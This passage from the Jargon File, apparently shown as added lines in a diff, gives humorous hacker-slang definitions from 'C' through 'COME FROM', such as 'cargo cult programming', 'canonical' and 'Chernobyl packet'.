successor should be named `D' or `P'. C became immensely + popular outside Bell Labs after about 1980 and is now the dominant + language in systems and microcomputer applications programming. + See also {languages of choice}, {indent style}. + + C is often described, with a mixture of fondness and disdain + varying according to the speaker, as "a language that combines + all the elegance and power of assembly language with all the + readability and maintainability of assembly language". + +:C Programmer's Disease: n. The tendency of the undisciplined C + programmer to set arbitrary but supposedly generous static limits + on table sizes (defined, if you're lucky, by constants in header + files) rather than taking the trouble to do proper dynamic storage + allocation. If an application user later needs to put 68 elements + into a table of size 50, the afflicted programmer reasons that he + can easily reset the table size to 68 (or even as much as 70, to + allow for future expansion), and recompile. This gives the + programmer the comfortable feeling of having done his bit to + satisfy the user's (unreasonable) demands, and often affords the + user multiple opportunities to explore the marvelous consequences + of {fandango on core}. In severe cases of the disease, the + programmer cannot comprehend why each fix of this kind seems only + to further disgruntle the user. + +:calculator: [Cambridge] n. Syn. for {bitty box}. + +:can: vt. To abort a job on a time-sharing system. Used esp. when the + person doing the deed is an operator, as in "canned from the + {{console}}". Frequently used in an imperative sense, as in "Can + that print job, the LPT just popped a sprocket!" Synonymous with + {gun}. It is said that the ASCII character with mnemonic CAN + (0011000) was used as a kill-job character on some early OSes. + +:can't happen: The traditional program comment for code executed + under a condition that should never be true, for example a file + size computed as negative. Often, such a condition being true + indicates data corruption or a faulty algorithm; it is almost + always handled by emitting a fatal error message and terminating or + crashing, since there is little else that can be done. This is + also often the text emitted if the `impossible' error actually + happens! Although "can't happen" events are genuinely infrequent + in production code, programmers wise enough to check for them + habitually are often surprised at how often they are triggered + during development and how many headaches checking for them turns + out to head off. + +:candygrammar: n. A programming-language grammar that is mostly + {syntactic sugar}; the term is also a play on `candygram'. + {COBOL}, Apple's Hypertalk language, and a lot of the so-called + `4GL' database languages are like this. The usual intent of such + designs is that they be as English-like as possible, on the theory + that they will then be easier for unskilled people to program. + This intention comes to grief on the reality that syntax isn't what + makes programming hard; it's the mental effort and organization + required to specify an algorithm precisely that costs. Thus the + invariable result is that `candygrammar' languages are just as + difficult to program in as terser ones, and far more painful for + the experienced hacker. + + [The overtones from the old Chevy Chase skit on Saturday Night Live + should not be overlooked. (This was a "Jaws" parody. + Someone lurking outside an apartment door tries all kinds of bogus + ways to get the occupant to open up, while ominous music plays in + the background. The last attempt is a half-hearted "Candygram!" + When the door is opened, a shark bursts in and chomps the poor + occupant. There is a moral here for those attracted to + candygrammars. Note that, in many circles, pretty much the same + ones who remember Monty Python sketches, all it takes is the word + "Candygram!", suitably timed, to get people rolling on the + floor.) --- GLS] + +:canonical: [historically, `according to religious law'] adj. The + usual or standard state or manner of something. This word has a + somewhat more technical meaning in mathematics. Two formulas such + as 9 + x and x + 9 are said to be equivalent because + they mean the same thing, but the second one is in `canonical + form' because it is written in the usual way, with the highest + power of x first. Usually there are fixed rules you can use + to decide whether something is in canonical form. The jargon + meaning, a relaxation of the technical meaning, acquired its + present loading in computer-science culture largely through its + prominence in Alonzo Church's work in computation theory and + mathematical logic (see {Knights of the Lambda Calculus}). + Compare {vanilla}. + + This word has an interesting history. Non-technical academics do + not use the adjective `canonical' in any of the senses defined + above with any regularity; they do however use the nouns `canon' + and `canonicity' (not *canonicalness or *canonicality). The + `canon' of a given author is the complete body of authentic works + by that author (this usage is familiar to Sherlock Holmes fans as + well as to literary scholars). `*The* canon' is the body of + works in a given field (e.g., works of literature, or of art, or of + music) deemed worthwhile for students to study and for scholars to + investigate. + + The word `canon' derives ultimately from the Greek + `kanon' + (akin to the English `cane') referring to a reed. Reeds were used + for measurement, and in Latin and later Greek the word `canon' + meant a rule or a standard. The establishment of a canon of + scriptures within Christianity was meant to define a standard or a + rule for the religion. The above non-techspeak academic usages + stem from this instance of a defined and accepted body of work. + Alongside this usage was the promulgation of `canons' (`rules') + for the government of the Catholic Church. The techspeak usages + ("according to religious law") derive from this use of the Latin + `canon'. + + Hackers invest this term with a playfulness that makes an ironic + contrast with its historical meaning. A true story: One Bob + Sjoberg, new at the MIT AI Lab, expressed some annoyance at the use + of jargon. Over his loud objections, GLS and RMS made a point of + using it as much as possible in his presence, and eventually it + began to sink in. Finally, in one conversation, he used the word + `canonical' in jargon-like fashion without thinking. Steele: + "Aha! We've finally got you talking jargon too!" Stallman: + "What did he say?" Steele: "Bob just used `canonical' in the + canonical way." + + Of course, canonicality depends on context, but it is implicitly + defined as the way *hackers* normally expect things to be. + Thus, a hacker may claim with a straight face that `according to + religious law' is *not* the canonical meaning of `canonical'. + +:card: n. 1. An electronic printed-circuit board (see also {tall + card}, {short card}. 2. obs. Syn. {{punched card}}. + +:card walloper: n. An EDP programmer who grinds out batch programs + that do stupid things like print people's paychecks. Compare + {code grinder}. See also {{punched card}}, {eighty-column + mind}. + +:careware: /keir'weir/ n. {Shareware} for which either the + author suggests that some payment be made to a nominated charity + or a levy directed to charity is included on top of the + distribution charge. Syn. {charityware}; compare + {crippleware}, sense 2. + +:cargo cult programming: n. A style of (incompetent) programming + dominated by ritual inclusion of code or program structures that + serve no real purpose. A cargo cult programmer will usually + explain the extra code as a way of working around some bug + encountered in the past, but usually neither the bug nor the reason + the code apparently avoided the bug was ever fully understood + (compare {shotgun debugging}, {voodoo programming}). + + The term `cargo cult' is a reference to aboriginal religions that + grew up in the South Pacific after World War II. The practices of + these cults center on building elaborate mockups of airplanes and + military style landing strips in the hope of bringing the return of + the god-like airplanes that brought such marvelous cargo during the + war. Hackish usage probably derives from Richard Feynman's + characterization of certain practices as "cargo cult science" in + his book `Surely You're Joking, Mr. Feynman' (W. W. Norton + & Co, New York 1985, ISBN 0-393-01921-7). + +:cascade: n. 1. A huge volume of spurious error-message output + produced by a compiler with poor error recovery. This can happen + when one initial error throws the parser out of synch so that much + of the remaining program text is interpreted as garbaged or + ill-formed. 2. A chain of USENET followups each adding some + trivial variation of riposte to the text of the previous one, all + of which is reproduced in the new message; an {include war} in which + the object is to create a sort of communal graffito. + +:case and paste: [from `cut and paste'] n. 1. The addition of a new + {feature} to an existing system by selecting the code from an + existing feature and pasting it in with minor changes. Common in + telephony circles because most operations in a telephone switch are + selected using `case' statements. Leads to {software bloat}. + + In some circles of EMACS users this is called `programming by + Meta-W', because Meta-W is the EMACS command for copying a block of + text to a kill buffer in preparation to pasting it in elsewhere. + The term is condescending, implying that the programmer is acting + mindlessly rather than thinking carefully about what is required to + integrate the code for two similar cases. + +:casters-up mode: [IBM] n. Yet another synonym for `broken' or + `down'. Usually connotes a major failure. A system (hardware or + software) which is `down' may be already being restarted before + the failure is noticed, whereas one which is `casters up' is + usually a good excuse to take the rest of the day off (as long as + you're not responsible for fixing it). + +:casting the runes: n. What a {guru} does when you ask him or + her to run a particular program and type at it because it never + works for anyone else; esp. used when nobody can ever see what + the guru is doing different from what J. Random Luser does. + Compare {incantation}, {runes}, {examining the entrails}; + also see the AI koan about Tom Knight in "{A Selection + of AI Koans}" ({appendix A}). + +:cat: [from `catenate' via {{UNIX}} `cat(1)'] vt. + 1. [techspeak] To spew an entire file to the screen or some other + output sink without pause. 2. By extension, to dump large amounts + of data at an unprepared target or with no intention of browsing it + carefully. Usage: considered silly. Rare outside UNIX sites. See + also {dd}, {BLT}. + + Among UNIX fans, `cat(1)' is considered an excellent example + of user-interface design, because it outputs the file contents + without such verbosity as spacing or headers between the files, and + because it does not require the files to consist of lines of text, + but works with any sort of data. + + Among UNIX-haters, `cat(1)' is considered the {canonical} + example of *bad* user-interface design. This because it is more + often used to {blast} a file to standard output than to + concatenate two files. The name `cat' for the former + operation is just as unintuitive as, say, LISP's {cdr}. + + Of such oppositions are {holy wars} made.... + +:catatonic: adj. Describes a condition of suspended animation in + which something is so {wedged} or {hung} that it makes no + response. If you are typing on a terminal and suddenly the + computer doesn't even echo the letters back to the screen as you + type, let alone do what you're asking it to do, then the computer + is suffering from catatonia (possibly because it has crashed). + "There I was in the middle of a winning game of {nethack} and it + went catatonic on me! Aaargh!" Compare {buzz}. + +:cd tilde: /see-dee til-d*/ vi. To go home. From the UNIX + C-shell and Korn-shell command `cd ~', which takes + one `$HOME'. By extension, may be used with other arguments; + thus, over an electronic chat link, `cd ~coffee' + would mean "I'm going to the coffee machine." + +:cdr: /ku'dr/ or /kuh'dr/ [from LISP] vt. To skip past the + first item from a list of things (generalized from the LISP + operation on binary tree structures, which returns a list + consisting of all but the first element of its argument). In the + form `cdr down', to trace down a list of elements: "Shall we + cdr down the agenda?" Usage: silly. See also {loop through}. + + Historical note: The instruction format of the IBM 7090 that hosted + the original LISP implementation featured two 15-bit fields called + the `address' and `decrement' parts. The term `cdr' was originally + `Contents of Decrement part of Register'. Similarly, `car' stood + for `Contents of Address part of Register'. + + The cdr and car operations have since become bases for + formation of compound metaphors in non-LISP contexts. GLS recalls, + for example, a programming project in which strings were + represented as linked lists; the get-character and skip-character + operations were of course called CHAR and CHDR. + +:chad: /chad/ n. 1. The perforated edge strips on printer paper, after + they have been separated from the printed portion. Also called + {selvage} and {perf}. 2. obs. The confetti-like paper bits punched + out of cards or paper tape; this was also called `chaff', `computer + confetti', and `keypunch droppings'. + + Historical note: One correspondent believes `chad' (sense 2) + derives from the Chadless keypunch (named for its inventor), which + cut little u-shaped tabs in the card to make a hole when the tab + folded back, rather than punching out a circle/rectangle; it was + clear that if the Chadless keypunch didn't make them, then the + stuff that other keypunches made had to be `chad'. + +:chad box: n. {Iron Age} card punches contained boxes inside them, + about the size of a lunchbox (or in some models a large + wastebasket), that held the {chad} (sense 2). You had to open + the covers of the card punch periodically and empty the chad box. + The {bit bucket} was notionally the equivalent device in the CPU + enclosure, which was typically across the room in another great + gray-and-blue box. + +:chain: 1. [orig. from BASIC's `CHAIN' statement] vi. To hand + off execution to a child or successor without going through the + {OS} command interpreter that invoked it. The state of the + parent program is lost and there is no returning to it. Though + this facility used to be common on memory-limited micros and is + still widely supported for backward compatibility, the jargon usage + is semi-obsolescent; in particular, most UNIX programmers will + think of this as an {exec}. Oppose the more modern + {subshell}. 2. A series of linked data areas within an + operating system or application. `Chain rattling' is the process + of repeatedly running through the linked data areas searching for + one which is of interest to the executing program. The implication + is that there is a very large number of links on the chain. + +:channel: [IRC] n. The basic unit of discussion on {IRC}. Once + one joins a channel, everything one types is read by others on that + channel. Channels can either be named with numbers or with strings + that begin with a `#' sign, and can have topic descriptions (which + are generally irrelevant to the actual subject of discussion). + Some notable channels are `#initgame', `#hottub', and + `#report'. At times of international crisis, `#report' + has hundreds of members, some of whom take turns listening to + various news services and summarizing the news, or in some cases, + giving first-hand accounts of the action (e.g., Scud missile + attacks in Tel Aviv during the Gulf War in 1991). + +:channel hopping: [IRC, GEnie] n. To rapidly switch channels on + {IRC}, or GEnie chat board, just as a social butterfly might hop + from one group to another at a party. This may derive from the TV + watcher's idiom `channel surfing'. + +:channel op: /chan'l op/ [IRC] n. Someone who is endowed with + privileges on a particular {IRC} channel; commonly abbreviated + `chanop' or `CHOP'. These privileges include the right to + {kick} users, to change various status bits, and to make others + into CHOPs. + +:chanop: /chan'-op/ [IRC] n. See {channel op}. + +:char: /keir/ or /char/; rarely, /kar/ n. Shorthand for + `character'. Esp. used by C programmers, as `char' is + C's typename for character data. + +:charityware: /char'it-ee-weir`/ n. Syn. {careware}. + +:chase pointers: 1. vi. To go through multiple levels of + indirection, as in traversing a linked list or graph structure. + Used esp. by programmers in C, where explicit pointers are a very + common data type. This is techspeak, but it remains jargon when + used of human networks. "I'm chasing pointers. Bob said you + could tell me who to talk to about...." See {dangling + pointer} and {snap}. 2. [Cambridge] `pointer chase' or + `pointer hunt': The process of going through a dump + (interactively or on a large piece of paper printed with hex + {runes}) following dynamic data-structures. Used only in a + debugging context. + +:check: n. A hardware-detected error condition, most commonly used + to refer to actual hardware failures rather than software-induced + traps. E.g., a `parity check' is the result of a + hardware-detected parity error. Recorded here because it's often + humorously extended to non-technical problems. For example, the + term `child check' has been used to refer to the problems caused + by a small child who is curious to know what happens when s/he + presses all the cute buttons on a computer's console (of course, + this particular problem could have been prevented with + {molly-guard}s). + +:chemist: [Cambridge] n. Someone who wastes computer time on + {number-crunching} when you'd far rather the machine were doing + something more productive, such as working out anagrams of your + name or printing Snoopy calendars or running {life} patterns. + May or may not refer to someone who actually studies chemistry. + +:Chernobyl chicken: n. See {laser chicken}. + +:Chernobyl packet: /cher-noh'b*l pak'*t/ n. A network packet that + induces {network meltdown} (the result of a {broadcast + storm}), in memory of the April 1986 nuclear accident at Chernobyl + in Ukraine. The typical scenario involves an IP Ethernet datagram + that passes through a gateway with both source and destination + Ether and IP address set as the respective broadcast addresses for + the subnetworks being gated between. Compare {Christmas tree + packet}. + +:chicken head: [Commodore] n. The Commodore Business Machines logo, + which strongly resembles a poultry part. Rendered in ASCII as + `C='. With the arguable exception of the Amiga (see {amoeba}), + Commodore's machines are notoriously crocky little {bitty box}es + (see also {PETSCII}). Thus, this usage may owe something to + Philip K. Dick's novel `Do Androids Dream of Electric Sheep?' + (the basis for the movie `Blade Runner'), in which a + `chickenhead' is a mutant with below-average intelligence. + +:chiclet keyboard: n. A keyboard with small rectangular or + lozenge-shaped rubber or plastic keys that look like pieces of + chewing gum. (Chiclets is the brand name of a variety of chewing + gum that does in fact resemble the keys of chiclet keyboards.) + Used esp. to describe the original IBM PCjr keyboard. Vendors + unanimously liked these because they were cheap, and a lot of early + portable and laptop products got launched using them. Customers + rejected the idea with almost equal unanimity, and chiclets are not + often seen on anything larger than a digital watch any more. + +:chine nual: /sheen'yu-*l/ [MIT] n.,obs. The Lisp Machine Manual, so + called because the title was wrapped around the cover so only those + letters showed on the front. + +:Chinese Army technique: n. Syn. {Mongolian Hordes technique}. + +:choke: v. 1. To reject input, often ungracefully. "NULs make System + V's `lpr(1)' choke." "I tried building an {EMACS} binary to + use {X}, but `cpp(1)' choked on all those `#define's." + See {barf}, {gag}, {vi}. 2. [MIT] More generally, to fail at any + endeavor, but with some flair or bravado; the popular definition is + "to snatch defeat from the jaws of victory." + +:chomp: vi. To {lose}; specifically, to chew on something of + which more was bitten off than one can. Probably related to + gnashing of teeth. See {bagbiter}. A hand gesture commonly + accompanies this. To perform it, hold the four fingers together + and place the thumb against their tips. Now open and close your + hand rapidly to suggest a biting action (much like what Pac-Man + does in the classic video game, though this pantomime seems to + predate that). The gesture alone means `chomp chomp' (see + "{Verb Doubling}" in the "{Jargon + Construction}" section of the Prependices). The hand may be + pointed at the object of complaint, and for real emphasis you can + use both hands at once. Doing this to a person is equivalent to + saying "You chomper!" If you point the gesture at yourself, it + is a humble but humorous admission of some failure. You might do + this if someone told you that a program you had written had failed + in some surprising way and you felt dumb for not having anticipated + it. + +:chomper: n. Someone or something that is chomping; a loser. See + {loser}, {bagbiter}, {chomp}. + +:CHOP: /chop/ [IRC] n. See {channel op}. + +:Christmas tree: n. A kind of RS-232 line tester or breakout box + featuring rows of blinking red and green LEDs suggestive of + Christmas lights. + +:Christmas tree packet: n. A packet with every single option set for + whatever protocol is in use. See {kamikaze packet}, {Chernobyl + packet}. (The term doubtless derives from a fanciful image of each + little option bit being represented by a different-colored light + bulb, all turned on.) + +:chrome: [from automotive slang via wargaming] n. Showy features + added to attract users but contributing little or nothing to + the power of a system. "The 3D icons in Motif are just chrome, + but they certainly are *pretty* chrome!" Distinguished from + {bells and whistles} by the fact that the latter are usually + added to gratify developers' own desires for featurefulness. + Often used as a term of contempt. + +:chug: vi. To run slowly; to {grind} or {grovel}. "The disk is + chugging like crazy." + +:Church of the SubGenius: n. A mutant offshoot of + {Discordianism} launched in 1981 as a spoof of fundamentalist + Christianity by the `Reverend' Ivan Stang, a brilliant satirist + with a gift for promotion. Popular among hackers as a rich source + of bizarre imagery and references such as "Bob" the divine + drilling-equipment salesman, the Benevolent Space Xists, and the + Stark Fist of Removal. Much SubGenius theory is concerned with the + acquisition of the mystical substance or quality of `slack'. + +:Cinderella Book: [CMU] n. `Introduction to Automata Theory, + Languages, and Computation', by John Hopcroft and Jeffrey Ullman, + (Addison-Wesley, 1979). So called because the cover depicts a girl + (putatively Cinderella) sitting in front of a Rube Goldberg device + and holding a rope coming out of it. The back cover depicts the + girl with the device in shambles after she has pulled on the rope. + See also {{book titles}}. + +:CI$: // n. Hackerism for `CIS', CompuServe Information Service. + The dollar sign refers to CompuServe's rather steep line charges. + Often used in {sig block}s just before a CompuServe address. + Syn. {Compu$erve}. + +:Classic C: /klas'ik C/ [a play on `Coke Classic'] n. The + C programming language as defined in the first edition of {K&R}, + with some small additions. It is also known as `K&R C'. The name + came into use while C was being standardized by the ANSI X3J11 + committee. Also `C Classic'. This is sometimes applied + elsewhere: thus, `X Classic', where X = Star Trek (referring to the + original TV series) or X = PC (referring to IBM's ISA-bus machines + as opposed to the PS/2 series). This construction is especially + used of product series in which the newer versions are considered + serious losers relative to the older ones. + +:clean: 1. adj. Used of hardware or software designs, implies + `elegance in the small', that is, a design or implementation that + may not hold any surprises but does things in a way that is + reasonably intuitive and relatively easy to comprehend from the + outside. The antonym is `grungy' or {crufty}. 2. v. To remove + unneeded or undesired files in a effort to reduce clutter: "I'm + cleaning up my account." "I cleaned up the garbage and now have + 100 Meg free on that partition." + +:CLM: /C-L-M/ [Sun: `Career Limiting Move'] 1. n. An action + endangering one's future prospects of getting plum projects and + raises, and possibly one's job: "His Halloween costume was a + parody of his manager. He won the prize for `best CLM'." + 2. adj. Denotes extreme severity of a bug, discovered by a + customer and obviously missed earlier because of poor testing: + "That's a CLM bug!" + +:clobber: vt. To overwrite, usually unintentionally: "I walked off + the end of the array and clobbered the stack." Compare {mung}, + {scribble}, {trash}, and {smash the stack}. + +:clocks: n. Processor logic cycles, so called because each + generally corresponds to one clock pulse in the processor's timing. + The relative execution times of instructions on a machine are + usually discussed in clocks rather than absolute fractions of a + second; one good reason for this is that clock speeds for various + models of the machine may increase as technology improves, and it + is usually the relative times one is interested in when discussing + the instruction set. Compare {cycle}. + +:clone: n. 1. An exact duplicate: "Our product is a clone of + their product." Implies a legal reimplementation from + documentation or by reverse-engineering. Also connotes lower + price. 2. A shoddy, spurious copy: "Their product is a + clone of our product." 3. A blatant ripoff, most likely violating + copyright, patent, or trade secret protections: "Your + product is a clone of my product." This use implies legal + action is pending. 4. A `PC clone'; a PC-BUS/ISA or + EISA-compatible 80x86-based microcomputer (this use is sometimes + spelled `klone' or `PClone'). These invariably have much + more bang for the buck than the IBM archetypes they resemble. + 5. In the construction `UNIX clone': An OS designed to deliver + a UNIX-lookalike environment without UNIX license fees, or with + additional `mission-critical' features such as support for + real-time programming. 6. v. To make an exact copy of something. + "Let me clone that" might mean "I want to borrow that paper so I + can make a photocopy" or "Let me get a copy of that file before + you {mung} it". + +:clover key: [Mac users] n. See {feature key}. + +:clustergeeking: /kluh'st*r-gee`king/ [CMU] n. Spending more time + at a computer cluster doing CS homework than most people spend + breathing. + +:COBOL: /koh'bol/ [COmmon Business-Oriented Language] n. + (Synonymous with {evil}.) A weak, verbose, and flabby language + used by {card walloper}s to do boring mindless things on + {dinosaur} mainframes. Hackers believe that all COBOL + programmers are {suit}s or {code grinder}s, and no + self-respecting hacker will ever admit to having learned the + language. Its very name is seldom uttered without ritual + expressions of disgust or horror. See also {fear and loathing}, + {software rot}. + +:COBOL fingers: /koh'bol fing'grz/ n. Reported from Sweden, a + (hypothetical) disease one might get from coding in COBOL. The + language requires code verbose beyond all reason; thus it is + alleged that programming too much in COBOL causes one's fingers to + wear down to stubs by the endless typing. "I refuse to type in + all that source code again; it would give me COBOL fingers!" + +:code grinder: n. 1. A {suit}-wearing minion of the sort hired in + legion strength by banks and insurance companies to implement + payroll packages in RPG and other such unspeakable horrors. In its + native habitat, the code grinder often removes the suit jacket to + reveal an underplumage consisting of button-down shirt (starch + optional) and a tie. In times of dire stress, the sleeves (if + long) may be rolled up and the tie loosened about half an inch. It + seldom helps. The {code grinder}'s milieu is about as far from + hackerdom as one can get and still touch a computer; the term + connotes pity. See {Real World}, {suit}. 2. Used of or to a + hacker, a really serious slur on the person's creative ability; + connotes a design style characterized by primitive technique, + rule-boundedness, {brute force}, and utter lack of imagination. + Compare {card walloper}; contrast {hacker}, {real + programmer}. + +:code police: [by analogy with George Orwell's `thought police'] n. + A mythical team of Gestapo-like storm troopers that might burst + into one's office and arrest one for violating programming style + rules. May be used either seriously, to underline a claim that a + particular style violation is dangerous, or ironically, to suggest + that the practice under discussion is condemned mainly by + anal-retentive {weenie}s. "Dike out that goto or the code + police will get you!" The ironic usage is perhaps more common. + +:codewalker: n. A program component that traverses other programs for + a living. Compilers have codewalkers in their front ends; so do + cross-reference generators and some database front ends. Other + utility programs that try to do too much with source code may turn + into codewalkers. As in "This new `vgrind' feature would require a + codewalker to implement." + +:coefficient of X: n. Hackish speech makes rather heavy use of + pseudo-mathematical metaphors. Four particularly important ones + involve the terms `coefficient', `factor', `index', and + `quotient'. They are often loosely applied to things you + cannot really be quantitative about, but there are subtle + distinctions among them that convey information about the way the + speaker mentally models whatever he or she is describing. + + `Foo factor' and `foo quotient' tend to describe something for + which the issue is one of presence or absence. The canonical + example is {fudge factor}. It's not important how much you're + fudging; the term simply acknowledges that some fudging is needed. + You might talk of liking a movie for its silliness factor. + Quotient tends to imply that the property is a ratio of two + opposing factors: "I would have won except for my luck quotient." + This could also be "I would have won except for the luck factor", + but using *quotient* emphasizes that it was bad luck + overpowering good luck (or someone else's good luck overpowering + your own). + + `Foo index' and `coefficient of foo' both tend to imply + that foo is, if not strictly measurable, at least something that + can be larger or smaller. Thus, you might refer to a paper or + person as having a `high bogosity index', whereas you would be less + likely to speak of a `high bogosity factor'. `Foo index' suggests + that foo is a condensation of many quantities, as in the mundane + cost-of-living index; `coefficient of foo' suggests that foo is a + fundamental quantity, as in a coefficient of friction. The choice + between these terms is often one of personal preference; e.g., some + people might feel that bogosity is a fundamental attribute and thus + say `coefficient of bogosity', whereas others might feel it is a + combination of factors and thus say `bogosity index'. + +:cokebottle: /kohk'bot-l/ n. Any very unusual character, + particularly one you can't type because it it isn't on your + keyboard. MIT people used to complain about the + `control-meta-cokebottle' commands at SAIL, and SAIL people + complained right back about the `{altmode}-altmode-cokebottle' + commands at MIT. After the demise of the {space-cadet + keyboard}, `cokebottle' faded away as serious usage, but was + often invoked humorously to describe an (unspecified) weird or + non-intuitive keystroke command. It may be due for a second + inning, however. The OSF/Motif window manager, `mwm(1)', has + a reserved keystroke for switching to the default set of + keybindings and behavior. This keystroke is (believe it or not) + `control-meta-bang' (see {bang}). Since the exclamation point + looks a lot like an upside down Coke bottle, Motif hackers have + begun referring to this keystroke as `cokebottle'. See also + {quadruple bucky}. + +:cold boot: n. See {boot}. + +:COME FROM: n. A semi-mythical language construct dual to the `go + to'; `COME FROM'